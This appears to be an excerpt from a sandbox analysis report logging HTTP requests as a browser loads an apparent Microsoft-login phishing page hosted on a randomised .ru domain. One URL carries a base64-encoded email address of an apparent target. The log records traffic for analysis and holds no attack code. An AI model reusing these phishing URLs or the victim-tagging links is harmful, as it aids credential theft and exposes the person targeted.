          Source: global trafficHTTP traffic detected: GET /favicon.ico HTTP/1.1Host: challenges.cloudflare.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
          Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/g/orchestrate/chl_api/v1?ray=84b92c841f99b127 HTTP/1.1Host: challenges.cloudflare.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
          Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/g/flow/ov1/665851253:1706274618:ee7eBQ0fH6Ey9MEbinbSg9TNLutSYhmnKDUTs70R0JE/84b92c841f99b127/bd4b5c1cf495e39 HTTP/1.1Host: challenges.cloudflare.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
          Source: global trafficHTTP traffic detected: GET /hIdlMLOfWxySOTr9FfmxCijqf/ HTTP/1.1Host: bggcwvekn3axi3ffz5ai.rvucouijw.ruConnection: keep-aliveCache-Control: max-age=0sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: same-originSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentReferer: https://bggcwvekn3axi3ffz5ai.rvucouijw.ru/hIdlMLOfWxySOTr9FfmxCijqf/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: PHPSESSID=ls834djnk0rde6vlt948asvcmr
          Source: global trafficHTTP traffic detected: GET /1NvPLxRoMcdUBerpFudBvnKUtP/ HTTP/1.1Host: bggcwvekn3axi3ffz5ai.rvucouijw.ruConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://bggcwvekn3axi3ffz5ai.rvucouijw.ru/hIdlMLOfWxySOTr9FfmxCijqf/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: PHPSESSID=ls834djnk0rde6vlt948asvcmr
          Source: global trafficHTTP traffic detected: GET /VyRsmGftiIlOxrabXBIOtQtS/?0HbagOxTQkTz?080cc3b5ddZGF2aWQueXZvbkBhZnRyYWwuY29t HTTP/1.1Host: bggcwvekn3axi3ffz5ai.rvucouijw.ruConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: same-originSec-Fetch-Mode: navigateSec-Fetch-Dest: documentReferer: https://bggcwvekn3axi3ffz5ai.rvucouijw.ru/hIdlMLOfWxySOTr9FfmxCijqf/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: PHPSESSID=ls834djnk0rde6vlt948asvcmr
          Source: global trafficHTTP traffic detected: GET /VyRsmGftiIlOxrabXBIOtQtS/0HbagOxTQkTz?080cc3b5ddZGF2aWQueXZvbkBhZnRyYWwuY29t HTTP/1.1Host: bggcwvekn3axi3ffz5ai.rvucouijw.ruConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://bggcwvekn3axi3ffz5ai.rvucouijw.ru/VyRsmGftiIlOxrabXBIOtQtS/?0HbagOxTQkTz?080cc3b5ddZGF2aWQueXZvbkBhZnRyYWwuY29tAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: PHPSESSID=ls834djnk0rde6vlt948asvcmr
          Source: global trafficHTTP traffic detected: GET /VyRsmGftiIlOxrabXBIOtQtS/6VgXjpQhSkDxT/1GTjuH2PpS3PpDRx HTTP/1.1Host: bggcwvekn3axi3ffz5ai.rvucouijw.ruConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: text/css,*/*;q=0.1Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://bggcwvekn3axi3ffz5ai.rvucouijw.ru/VyRsmGftiIlOxrabXBIOtQtS/?0HbagOxTQkTz?080cc3b5ddZGF2aWQueXZvbkBhZnRyYWwuY29tAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: PHPSESSID=ls834djnk0rde6vlt948asvcmr
          Source: global trafficHTTP traffic detected: GET /VyRsmGftiIlOxrabXBIOtQtS/6X8VIE8xj/7PshMcgyswItA HTTP/1.1Host: bggcwvekn3axi3ffz5ai.rvucouijw.ruConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://bggcwvekn3axi3ffz5ai.rvucouijw.ru/VyRsmGftiIlOxrabXBIOtQtS/?0HbagOxTQkTz?080cc3b5ddZGF2aWQueXZvbkBhZnRyYWwuY29tAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: PHPSESSID=ls834djnk0rde6vlt948asvcmr
          Source: global trafficHTTP traffic detected: GET /VyRsmGftiIlOxrabXBIOtQtS/6EWqQ2tPJ3hOCQyr/8EIQOSnBt HTTP/1.1Host: bggcwvekn3axi3ffz5ai.rvucouijw.ruConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://bggcwvekn3axi3ffz5ai.rvucouijw.ru/VyRsmGftiIlOxrabXBIOtQtS/?0HbagOxTQkTz?080cc3b5ddZGF2aWQueXZvbkBhZnRyYWwuY29tAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: PHPSESSID=ls834djnk0rde6vlt948asvcmr
          Source: global trafficHTTP traffic detected: GET /VyRsmGftiIlOxrabXBIOtQtS/63Ag6b7lSc/5vOgy6RaRMInSrZ5 HTTP/1.1Host: bggcwvekn3axi3ffz5ai.rvucouijw.ruConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://bggcwvekn3axi3ffz5ai.rvucouijw.ru/VyRsmGftiIlOxrabXBIOtQtS/?0HbagOxTQkTz?080cc3b5ddZGF2aWQueXZvbkBhZnRyYWwuY29tAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: PHPSESSID=ls834djnk0rde6vlt948asvcmr
          Source: global trafficHTTP traffic detected: GET /VyRsmGftiIlOxrabXBIOtQtS/6lp36DM7bxL/6YuqRWrsKjk HTTP/1.1Host: bggcwvekn3axi3ffz5ai.rvucouijw.ruConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://bggcwvekn3axi3ffz5ai.rvucouijw.ru/VyRsmGftiIlOxrabXBIOtQtS/?0HbagOxTQkTz?080cc3b5ddZGF2aWQueXZvbkBhZnRyYWwuY29tAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: PHPSESSID=ls834djnk0rde6vlt948asvcmr
          Source: global trafficHTTP traffic detected: GET /VyRsmGftiIlOxrabXBIOtQtS/6NPonlRNZ/2nXHEFxrXx6mk4 HTTP/1.1Host: bggcwvekn3axi3ffz5ai.rvucouijw.ruConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://bggcwvekn3axi3ffz5ai.rvucouijw.ru/VyRsmGftiIlOxrabXBIOtQtS/?0HbagOxTQkTz?080cc3b5ddZGF2aWQueXZvbkBhZnRyYWwuY29tAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: PHPSESSID=ls834djnk0rde6vlt948asvcmr
          Source: global trafficHTTP traffic detected: GET /VyRsmGftiIlOxrabXBIOtQtS/6oIPrEsjzA9/2y7aQ7c0EhFH7oS HTTP/1.1Host: bggcwvekn3axi3ffz5ai.rvucouijw.ruConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://bggcwvekn3axi3ffz5ai.rvucouijw.ru/VyRsmGftiIlOxrabXBIOtQtS/?0HbagOxTQkTz?080cc3b5ddZGF2aWQueXZvbkBhZnRyYWwuY29tAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: PHPSESSID=ls834djnk0rde6vlt948asvcmr
          Source: global trafficHTTP traffic detected: GET /VyRsmGftiIlOxrabXBIOtQtS/6ggGbKMm5p/3zCyDRX4zxDo HTTP/1.1Host: bggcwvekn3axi3ffz5ai.rvucouijw.ruConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://bggcwvekn3axi3ffz5ai.rvucouijw.ru/VyRsmGftiIlOxrabXBIOtQtS/?0HbagOxTQkTz?080cc3b5ddZGF2aWQueXZvbkBhZnRyYWwuY29tAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: PHPSESSID=ls834djnk0rde6vlt948asvcmr
          Source: global trafficHTTP traffic detected: GET /c1c6b6c8-ki84gzfnv92xf5tqkjliaaxfln-fs-ciyrjnai5-wto/logintenantbranding/0/illustration?ts=636978479848606228 HTTP/1.1Host: aadcdn.msauthimages.netConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://bggcwvekn3axi3ffz5ai.rvucouijw.ru/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
          Source: global trafficHTTP traffic detected: GET /VyRsmGftiIlOxrabXBIOtQtS/3ETwEspTY8j HTTP/1.1Host: bggcwvekn3axi3ffz5ai.rvucouijw.ruConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: PHPSESSID=ls834djnk0rde6vlt948asvcmr
          Source: global trafficHTTP traffic detected: GET /c1c6b6c8-ki84gzfnv92xf5tqkjliaaxfln-fs-ciyrjnai5-wto/logintenantbranding/0/bannerlogo?ts=636973066507737181 HTTP/1.1Host: aadcdn.msauthimages.netConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://bggcwvekn3axi3ffz5ai.rvucouijw.ru/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
          Source: global trafficHTTP traffic detected: GET /VyRsmGftiIlOxrabXBIOtQtS/6ggGbKMm5p/3zCyDRX4zxDo HTTP/1.1Host: bggcwvekn3axi3ffz5ai.rvucouijw.ruConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: PHPSESSID=ls834djnk0rde6vlt948asvcmr
          Source: global trafficHTTP traffic detected: GET /VyRsmGftiIlOxrabXBIOtQtS/6lp36DM7bxL/6YuqRWrsKjk HTTP/1.1Host: bggcwvekn3axi3ffz5ai.rvucouijw.ruConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: PHPSESSID=ls834djnk0rde6vlt948asvcmr
          Source: global trafficHTTP traffic detected: GET /VyRsmGftiIlOxrabXBIOtQtS/6NPonlRNZ/2nXHEFxrXx6mk4 HTTP/1.1Host: bggcwvekn3axi3ffz5ai.rvucouijw.ruConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: PHPSESSID=ls834djnk0rde6vlt948asvcmr
          Source: global trafficHTTP traffic detected: GET /VyRsmGftiIlOxrabXBIOtQtS/6oIPrEsjzA9/2y7aQ7c0EhFH7oS HTTP/1.1Host: bggcwvekn3axi3ffz5ai.rvucouijw.ruConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: PHPSESSID=ls834djnk0rde6vlt948asvcmr
          Source: global trafficHTTP traffic detected: GET /VyRsmGftiIlOxrabXBIOtQtS/63Ag6b7lSc/5vOgy6RaRMInSrZ5 HTTP/1.1Host: bggcwvekn3axi3ffz5ai.rvucouijw.ruConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: PHPSESSID=ls834djnk0rde6vlt948asvcmr
          Source: global trafficHTTP traffic detected: GET /c1c6b6c8-ki84gzfnv92xf5tqkjliaaxfln-fs-ciyrjnai5-wto/logintenantbranding/0/bannerlogo?ts=636973066507737181 HTTP/1.1Host: aadcdn.msauthimages.netConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
          Source: global trafficHTTP traffic detected: GET /c1c6b6c8-ki84gzfnv92xf5tqkjliaaxfln-fs-ciyrjnai5-wto/logintenantbranding/0/illustration?ts=636978479848606228 HTTP/1.1Host: aadcdn.msauthimages.netConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
          Source: global trafficHTTP traffic detected: GET /VyRsmGftiIlOxrabXBIOtQtS/6X8VIE8xj/7PshMcgyswItA HTTP/1.1Host: bggcwvekn3axi3ffz5ai.rvucouijw.ruConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: PHPSESSID=ls834djnk0rde6vlt948asvcmr
          Source: global trafficHTTP traffic detected: GET /VyRsmGftiIlOxrabXBIOtQtS/6EWqQ2tPJ3hOCQyr/8EIQOSnBt HTTP/1.1Host: bggcwvekn3axi3ffz5ai.rvucouijw.ruConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: PHPSESSID=ls834djnk0rde6vlt948asvcmr
          Source: global trafficHTTP traffic detected: GET /VyRsmGftiIlOxrabXBIOtQtS/925oSlCqhBF56mV?0AAZf0BPQd1iVI?er HTTP/1.1Host: bggcwvekn3axi3ffz5ai.rvucouijw.ruConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: same-originSec-Fetch-Mode: navigateSec-Fetch-Dest: documentReferer: https://bggcwvekn3axi3ffz5ai.rvucouijw.ru/VyRsmGftiIlOxrabXBIOtQtS/30VyqDe0V3Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: PHPSESSID=ls834djnk0rde6vlt948asvcmr
          Source: global trafficHTTP traffic detected: GET /VyRsmGftiIlOxrabXBIOtQtS/0AAZf0BPQd1iVI?er HTTP/1.1Host: bggcwvekn3axi3ffz5ai.rvucouijw.ruConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://bggcwvekn3axi3ffz5ai.rvucouijw.ru/VyRsmGftiIlOxrabXBIOtQtS/925oSlCqhBF56mV?0AAZf0BPQd1iVI?erAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: PHPSESSID=ls834djnk0rde6vlt948asvcmr
          Source: global trafficHTTP traffic detected: GET /VyRsmGftiIlOxrabXBIOtQtS/69MiXSEC36w/1JnZnyDdbo HTTP/1.1Host: bggcwvekn3axi3ffz5ai.rvucouijw.ruConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: text/css,*/*;q=0.1Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://bggcwvekn3axi3ffz5ai.rvucouijw.ru/VyRsmGftiIlOxrabXBIOtQtS/925oSlCqhBF56mV?0AAZf0BPQd1iVI?erAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: PHPSESSID=ls834djnk0rde6vlt948asvcmr
          Source: global trafficHTTP traffic detected: GET /VyRsmGftiIlOxrabXBIOtQtS/67csesv4NT/7LYfTUz8QHbjxIA HTTP/1.1Host: bggcwvekn3axi3ffz5ai.rvucouijw.ruConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://bggcwvekn3axi3ffz5ai.rvucouijw.ru/VyRsmGftiIlOxrabXBIOtQtS/925oSlCqhBF56mV?0AAZf0BPQd1iVI?erAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: PHPSESSID=ls834djnk0rde6vlt948asvcmr
          Source: global trafficHTTP traffic detected: GET /VyRsmGftiIlOxrabXBIOtQtS/65MQK7mlo31/8FDDCleRwIP HTTP/1.1Host: bggcwvekn3axi3ffz5ai.rvucouijw.ruConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://bggcwvekn3axi3ffz5ai.rvucouijw.ru/VyRsmGftiIlOxrabXBIOtQtS/925oSlCqhBF56mV?0AAZf0BPQd1iVI?erAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: PHPSESSID=ls834djnk0rde6vlt948asvcmr
          Source: global trafficHTTP traffic detected: GET /SLS/%7BE7A50285-D08D-499D-9FF8-180FDC2332BC%7D/x64/10.0.19045.2006/0?CH=700&L=en-GB&P=&PT=0x30&WUA=10.0.19041.1949&MK=wN7XR4hVYYybUva&MD=vM4W2nhp HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.33Host: slscr.update.microsoft.com
          Source: global trafficHTTP traffic detected: GET /VyRsmGftiIlOxrabXBIOtQtS/6UFXgkkNqmgDOtNY/3c90WBkIQ HTTP/1.1Host: bggcwvekn3axi3ffz5ai.rvucouijw.ruConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://bggcwvekn3axi3ffz5ai.rvucouijw.ru/VyRsmGftiIlOxrabXBIOtQtS/925oSlCqhBF56mV?0AAZf0BPQd1iVI?erAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: PHPSESSID=ls834djnk0rde6vlt948asvcmr
